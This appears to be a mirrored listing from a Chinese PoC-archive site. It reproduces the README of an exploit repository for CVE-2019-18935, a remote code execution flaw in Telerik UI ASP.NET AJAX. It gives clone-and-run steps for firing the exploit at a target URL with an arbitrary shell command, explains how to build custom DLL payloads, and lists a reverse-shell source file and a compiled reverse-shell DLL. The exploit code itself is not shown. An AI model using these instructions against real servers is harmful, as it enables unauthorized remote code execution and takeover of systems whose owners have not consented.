关联漏洞
描述
Exploit for CVE-2019-18935
介绍
# CVE-2019-18935 Exploit
Remote Code Execution exploit for Telerik UI ASP.NET AJAX through deserialization vulnerability.
## How to Run
### Step 1: Clone the Project
```bash
git clone https://github.com/menashe12346/CVE-2019-18935.git
cd CVE-2019-18935
```
### Step 2: In `CVE-2019-18935.py`, modify line 15:
```python
version = "2017.1.228" # Replace with target server's Telerik version
```
### Step 3: Run the Exploit
```bash
python CVE-2019-18935.py <target_url> <shell_command>
# Example:
python CVE-2019-18935.py http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau "whoami"
```
🔧 **Building Custom DLL Files**
To create a DLL from a different C file (not just reverse shell):
Install Visual Studio (Desktop development with c++) with these components:
- MSVC v143 - VS 2022 C++ x64/x86 build tools
- Windows 11 SDK
- C++ CMake tools for Windows
- C++ AddressSanitizer
Build the DLL:
```bash
build-dll.bat your_file.c
```
The DLL will be created in the `payloads/` directory.
📋 **File Descriptions**
```
CVE-2019-18935_exploit/
├── CVE-2019-18935.py # Main exploit code
├── RAU_crypto.py # Telerik encryption/decryption module
├── build-dll.bat # Script to build DLL files from C code
├── reverse_shell.c # C source code for reverse shell
└── payloads/ # Directory for Compiled DLL payload files
```
---
文件快照
[4.0K] /data/pocs/c1d949f059b352f00033ed7f56af9a5a28563fe9
├── [1.9K] build-dll.bat
├── [4.9K] CVE-2019-18935.py
├── [4.0K] payloads
│ └── [110K] reverse-shell-2025102319140360-x86.dll
├── [ 14K] RAU_crypto.py
├── [1.4K] README.md
└── [1.6K] reverse-shell.c
1 directory, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。